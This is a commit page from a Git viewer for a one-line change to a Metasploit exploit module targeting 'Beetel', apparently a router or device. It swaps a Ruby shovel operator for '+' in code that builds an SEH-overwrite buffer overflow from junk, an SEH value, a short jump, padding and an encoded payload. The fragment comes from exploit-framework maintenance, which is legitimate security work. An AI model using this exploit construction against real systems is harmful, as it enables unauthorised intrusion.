Land #10749, Ruby shovel operator fix for Beetel

GSoC/Meterpreter_Web_Console
William Vu 2018-10-05 02:20:52 -05:00
commit 8620ce0ed1
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 1 additions and 1 deletions

View File

@ -70,6 +70,6 @@ class MetasploitModule < Msf::Exploit
jump = Rex::Arch::X86.jmp_short(66)
padding = rand_text(66) # Pad past buffer corruption
junk << seh << jump << padding << payload.encoded
junk + seh + jump + padding + payload.encoded
end
end